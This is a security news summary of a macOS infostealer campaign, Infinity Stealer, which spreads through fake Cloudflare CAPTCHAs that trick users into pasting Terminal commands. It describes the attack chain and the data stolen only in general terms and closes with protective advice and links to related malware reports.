CP
cyberpings
Malware & RansomwareHIGH

Infinity Stealer - New macOS Malware Campaign Uncovered

Featured image for Infinity Stealer - New macOS Malware Campaign Uncovered
SASecurity Affairs
Infinity StealerNuitkamacOSClickFixMalwarebytes
🎯

Basically, a new malware tricks Mac users into running harmful commands.

Quick Summary

A new malware campaign called Infinity Stealer is targeting macOS users through fake Cloudflare CAPTCHAs. This sophisticated attack collects sensitive data, posing serious risks. Users are urged to take protective measures immediately.

What Happened

Researchers at Malwarebytes have identified a new macOS infostealer called Infinity Stealer. This malware uses a Python payload compiled with Nuitka and spreads through a method known as ClickFix. The attack begins with a fake Cloudflare CAPTCHA designed to deceive users into executing malicious commands in their Terminal. The report indicates that this is the first campaign of its kind targeting macOS, adapting techniques previously seen on Windows systems.

The fake CAPTCHA instructs users to open Terminal, paste a command, and execute it. This action initiates the infection process, which involves fetching a Stage-1 Bash dropper. The dropper decodes the payload and writes a Stage-2 binary that removes macOS protections and executes the payload. This sophisticated approach demonstrates that macOS is increasingly becoming a target for malware attacks.

Who's Being Targeted

The Infinity Stealer campaign primarily targets macOS users, capitalizing on their trust in familiar interfaces like Cloudflare. Users who encounter fake verification pages are at risk, especially if they follow the instructions without verifying their authenticity. This campaign is particularly concerning as it signifies a shift in the threat landscape, where macOS is no longer considered a low-risk environment for malware.

The malware collects sensitive information such as browser credentials, Keychain entries, and even screenshots. It also has the capability to detect analysis environments, making it more challenging for security professionals to identify and mitigate the threat. This adaptability showcases the evolving nature of cyber threats.

Signs of Infection

Indicators of infection include unexpected prompts to open Terminal and paste commands. Users may also notice unusual behavior on their devices, such as unauthorized access to sensitive information or unexpected notifications. If you suspect that you have executed suspicious commands, it is crucial to act quickly.

Malwarebytes has provided Indicators of Compromise (IOCs) for this campaign, which can help users and organizations identify potential infections. Signs of the malware's presence may include unauthorized access to accounts or unusual activity in applications like crypto wallets.

How to Protect Yourself

To safeguard against Infinity Stealer, users should take immediate action if they have run any suspicious Terminal commands. Here are some recommended steps:

  • Stop all sensitive activities immediately.
  • Change your passwords from a secure device.
  • Revoke any active sessions and keys associated with compromised accounts.
  • Check your /tmp directory and LaunchAgents for any unauthorized files.
  • Run a full scan with reputable antimalware software.

Experts advise against pasting commands from websites, as legitimate CAPTCHAs do not require such actions. Staying informed about emerging threats and employing good security hygiene can significantly reduce the risk of malware infections.

🔒 Pro insight: The adaptation of Windows-style tactics to macOS highlights a growing trend in cross-platform malware development, necessitating heightened vigilance among users.

Original article from

SASecurity Affairs· Pierluigi Paganini
Read Full Article

Share

Related Pings

HIGHMalware & Ransomware

Russian CTRL Toolkit - Malicious LNK Files Hijack RDP Access

Cybersecurity researchers have discovered a new Russian malware toolkit. Targeting Windows users, it exploits malicious LNK files to hijack RDP sessions, posing serious risks. Stay vigilant and protect your systems.

The Hacker News·
HIGHMalware & Ransomware

TeamPCP's Telnyx Attack - New Tactics with WAV Payloads

TeamPCP has launched a new attack using WAV-based payloads to steal credentials from users of the Telnyx SDK. This shift in tactics highlights the evolving nature of cyber threats. Users should downgrade to the last known safe version immediately to protect their systems.

Trend Micro Research·
HIGHMalware & Ransomware

Malware - Highlights from the Week of March 23-29, 2026

This past week revealed new malware threats, including infostealers and scams. Users of popular platforms are at risk. Stay alert and protect your data with updated security measures.

Malwarebytes Labs·
HIGHMalware & Ransomware

VoidLink Malware Framework - AI-Assisted Threat Emerges with Serious Implications

The emergence of the VoidLink malware framework highlights the potential for AI-assisted malware development, with serious implications for cybersecurity.

Cyber Security News·
HIGHMalware & Ransomware

New Malware Targets Cobra DocGuard Users - Latest Insights

A new malware wave is targeting Cobra DocGuard users, raising concerns about data security. This impacts organizations handling sensitive information. Stay updated on protective measures to combat these threats.

Security Affairs·
HIGHMalware & Ransomware

Identity-Based Ransomware - Cloud Assets Under Threat

A new form of ransomware is targeting cloud and SaaS assets through identity theft. This method exploits browser vulnerabilities, posing a significant risk to users. Awareness and strong security measures are essential to protect sensitive data from these attacks.

SC Media·